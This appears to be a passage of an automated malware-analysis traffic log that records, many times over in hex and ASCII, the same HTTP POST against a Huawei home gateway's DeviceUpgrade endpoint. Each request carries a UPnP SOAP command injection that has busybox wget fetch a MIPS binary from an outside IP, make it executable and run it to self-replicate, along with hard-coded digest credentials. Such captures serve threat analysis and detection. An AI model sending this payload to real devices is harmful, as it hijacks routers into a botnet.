3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 